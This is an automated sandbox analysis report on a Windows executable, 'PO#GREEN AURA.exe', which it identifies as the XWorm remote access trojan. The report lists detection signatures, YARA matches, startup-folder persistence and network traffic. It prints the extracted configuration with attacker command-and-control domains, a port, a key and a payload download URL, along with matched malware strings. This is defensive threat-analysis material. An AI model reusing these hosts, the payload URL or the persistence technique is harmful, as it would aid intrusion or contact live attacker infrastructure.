Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#GREEN AURA.exe

Overview

General Information

Sample name:PO#GREEN AURA.exe
Analysis ID:1630686
MD5:71e0c8f71b15046709d4e250086346a4
SHA1:9536f9bc5e10128074cdd2597e970b29d44c4bcd
SHA256:462e4f6c2647a8fffb7be6a37eca3dfef4051f9f20a5e8927b446d98d1af84f0
Tags:exeuser-threatcat_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO#GREEN AURA.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\PO#GREEN AURA.exe" MD5: 71E0C8F71B15046709D4E250086346A4)
    • PO#GREEN AURA.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\PO#GREEN AURA.exe" MD5: 71E0C8F71B15046709D4E250086346A4)
      • WerFault.exe (PID: 4484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu", "bin12.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c77:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e29:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6ae9:$cnc4: POST / HTTP/1.1
    00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x220c3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x22160:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x22275:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x21f35:$cnc4: POST / HTTP/1.1
      00000000.00000002.1842730771.0000000006580000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        0.2.PO#GREEN AURA.exe.6580000.9.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0.2.PO#GREEN AURA.exe.6580000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            1.2.PO#GREEN AURA.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              1.2.PO#GREEN AURA.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
              • 0x59e5:$str01: $VB$Local_Port
              • 0x59d6:$str02: $VB$Local_Host
              • 0x5ce6:$str03: get_Jpeg
              • 0x568e:$str04: get_ServicePack
              • 0x6723:$str05: Select * from AntivirusProduct
              • 0x6921:$str06: PCRestart
              • 0x6935:$str07: shutdown.exe /f /r /t 0
              • 0x69e7:$str08: StopReport
              • 0x69bd:$str09: StopDDos
              • 0x6abf:$str10: sendPlugin
              • 0x6b3f:$str11: OfflineKeylogger Not Enabled
              • 0x6ca5:$str12: -ExecutionPolicy Bypass -File "
              • 0x6dce:$str13: Content-length: 5235
              1.2.PO#GREEN AURA.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x6e77:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x6f14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x7029:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x6ce9:$cnc4: POST / HTTP/1.1
              Click to see the 6 entries

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO#GREEN AURA.exe, ProcessId: 2136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu", "bin12.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
              Source: C:\Users\user\AppData\Roaming\Count.exeReversingLabs: Detection: 31%
              Source: PO#GREEN AURA.exeReversingLabs: Detection: 31%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpString decryptor: kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu,bin12.ydns.eu
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpString decryptor: 4050
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpString decryptor: CHINA DOGGY
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
              Source: PO#GREEN AURA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO#GREEN AURA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\System.pdbF source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Desktop\PO#GREEN AURA.PDBs source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\PO#GREEN AURA.PDB source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: n,C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbh source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ##.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EE5E2Fh0_2_06EE5AA0
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EE63E2h0_2_06EE61E9
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EE63E2h0_2_06EE61F8
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EEBEBBh0_2_06EEBF77
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EEBEBBh0_2_06EEBD28
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EEBEBBh0_2_06EEBD38
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EE5E2Fh0_2_06EE5A90
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06EE5E2Fh0_2_06EE5B83
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06F8C130h0_2_06F8C078
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 4x nop then jmp 06F8C130h0_2_06F8C070

              Networking

              barindex
              Source: Malware configuration extractorURLs: kingsbkup1.ydns.eu
              Source: Malware configuration extractorURLs: smfcs1.ydns.eu
              Source: Malware configuration extractorURLs: smfcs3.ydns.eu
              Source: Malware configuration extractorURLs: bin12.ydns.eu
              Source: global trafficHTTP traffic detected: GET /1/12/panel/uploads/Xlzsats.wav HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 45.144.214.104 45.144.214.104
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /1/12/panel/uploads/Xlzsats.wav HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: win32.ydns.eu
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win32.ydns.eu
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win32.ydns.eu/1/12/panel/uploads/Xlzsats.wav
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

              System Summary

              barindex
              Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: initial sampleStatic PE information: Filename: PO#GREEN AURA.exe
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F8D8F0 NtProtectVirtualMemory,0_2_06F8D8F0
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F8D8E9 NtProtectVirtualMemory,0_2_06F8D8E9
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_019543610_2_01954361
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_0195F9500_2_0195F950
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE22F00_2_06EE22F0
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE78700_2_06EE7870
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EEB5400_2_06EEB540
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EEB5500_2_06EEB550
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE5A900_2_06EE5A90
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE98180_2_06EE9818
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06EE98140_2_06EE9814
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F8A4B00_2_06F8A4B0
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F837D80_2_06F837D8
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F8A4A20_2_06F8A4A2
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_06F8CA390_2_06F8CA39
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_0702FB900_2_0702FB90
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_0702E5780_2_0702E578
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_070100070_2_07010007
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeCode function: 0_2_070100400_2_07010040
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000000.00000002.1841397492.0000000006220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHlzbztbfez.dll" vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003628000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHINA DOGGY X-WORM.exe4 vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHINA DOGGY X-WORM.exe4 vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000000.00000002.1828695571.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000AF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exe, 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHINA DOGGY X-WORM.exe4 vs PO#GREEN AURA.exe
              Source: PO#GREEN AURA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: PO#GREEN AURA.exe, -.csCryptographic APIs: 'CreateDecryptor'
              Source: PO#GREEN AURA.exe, Yvietm.csCryptographic APIs: 'TransformFinalBlock'
              Source: Count.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
              Source: Count.exe.0.dr, Yvietm.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, Yvietm.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Settings.csBase64 encoded string: 'plINeG3H7q6O5CjvVNe1BgYQfW6RVXr1RwNCSV7PFnikFkafKb9cYtfLlAed5U24c6kFCYSxvxbpE2UgKzZGGQ=='
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: Count.exe.0.dr, Oqvdlucx.csSuspicious method names: .Oqvdlucx.FetchPayloadAsync
              Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, Oqvdlucx.csSuspicious method names: .Oqvdlucx.FetchPayloadAsync
              Source: PO#GREEN AURA.exe, Oqvdlucx.csSuspicious method names: .Oqvdlucx.FetchPayloadAsync
              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@4/3@1/1
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbsJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMutant created: NULL
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeMutant created: \Sessions\1\BaseNamedObjects\QIUpnGyi0OFuIMGO
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:64:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3c61c146-366c-49e1-a958-ef322e048864Jump to behavior
              Source: PO#GREEN AURA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PO#GREEN AURA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PO#GREEN AURA.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeFile read: C:\Users\user\Desktop\PO#GREEN AURA.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeProcess created: C:\Users\user\Desktop\PO#GREEN AURA.exe "C:\Users\user\Desktop\PO#GREEN AURA.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PO#GREEN AURA.exeSection loaded: msasn1.dllJump to behavior
